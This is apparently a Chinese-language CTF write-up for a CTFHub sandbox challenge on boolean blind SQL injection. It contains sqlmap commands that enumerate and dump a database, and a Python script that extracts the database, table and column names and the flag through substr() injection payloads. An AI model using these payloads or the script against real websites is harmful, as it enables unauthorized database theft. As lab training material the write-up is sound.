小白一个,如有错误请指正!
一、布尔注入
盲注有三种解法:
1.sqlmap
2.python脚本
3.手注
这里我就用sqlmap和脚本(手注真的会累死人的有木有?)
解法一:sqlmap
我们只需要按步骤来就可以了
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 --dbs
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli --tables
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag --columns
sqlmap -u http://challenge-00cfdd6ec4589579.sandbox.ctfhub.com:10800/?id=123 -D sqli -T flag -C flag --dump
解法二:使用脚本
1.自己比较菜,写的脚本还有点小问题,只能刚好爆出flag
import requests
import time
def database_name():
count = 0
database_name = ''
for i in range(1, 7):
url_data_length = url + f'1 and length(database())>{i}'
res = requests.get(url_data_length)
count = count + 1
if mark_false in res.text:
for k in range(1, count+1):
for j in dict_name:
url_data_name = url + f'1 and substr(database(),{k},1)=\'{j}\''
# print(url_data_name)
res = requests.get(url_data_name)
if mark_true in res.text:
database_name = database_name + j
print('数据库名:' + database_name)
return database_name
break
def database_tables(database_name):
tables_name = []
for table_number in range(0, 2):
table_name = ''
for k in range(0, 5):
for word in dict_name:
url_table = url + f'1 and substr((select table_name from information_schema.tables where table_schema= \'{database_name}\' limit {table_number},1),{k},1)=\'{word}\''
# print(payload_3)
res = requests.get(url_table)
if mark_true in res.text:
table_name = table_name + word
if table_name != '':
print('表名:' + table_name)
tables_name.append(table_name)
return tables_name
def column_name(tables_name):
columns_name = []
for table_name in tables_name:
# print(table_name)
for column_number in range(0, 2):
column_name = ''
for k in range(0, 5):
for word in dict_name:
url_column = url + f'1 and substr((select column_name from information_schema.columns where table_name= \'{table_name}\' limit {column_number},1),{k},1)=\'{word}\''
# print(payload_3)
res = requests.get(url_column)
if mark_true in res.text:
column_name = column_name + word
if column_name != '':
print(f'{table_name}表字段名:' + column_name)
columns_name.append([table_name, column_name])
return columns_name
def flag_data(columns_name):
# print(columns_name)
for column_name in columns_name:
flag = ''
for column_number in range(0, 3):
for flag_number in range(0, 40):
for word in dict_flag:
# print(column_name[0], column_name[1])
url_flag = url + f'1 and substr((select {column_name[1]} from {column_name[0]} ),{flag_number},1)=\'{word}\''
# print(url_flag)
res = requests.get(url_flag)
if mark_true in res.text:
flag = flag + word
print(column_name[1] + ':' + flag)
# break
if __name__ == '__main__':
start = time.time()
url = 'http://challenge-4628615c0a2a2d50.sandbox.ctfhub.com:10800/?id='
mark_true = 'query_success'
mark_false = 'query_error'
dict_name = 'qwertyuiopasdfghjklzxcvbnm'
dict_flag = 'qwertyuiopasdfghjklzxcvbnm{}1234567890'
database_name = database_name()
tables_name = database_tables(database_name)
columns_name = column_name(tables_name)
flag = flag_data(columns_name)
end = time.time()
print('运行时间为:', (end - start))
后续更新~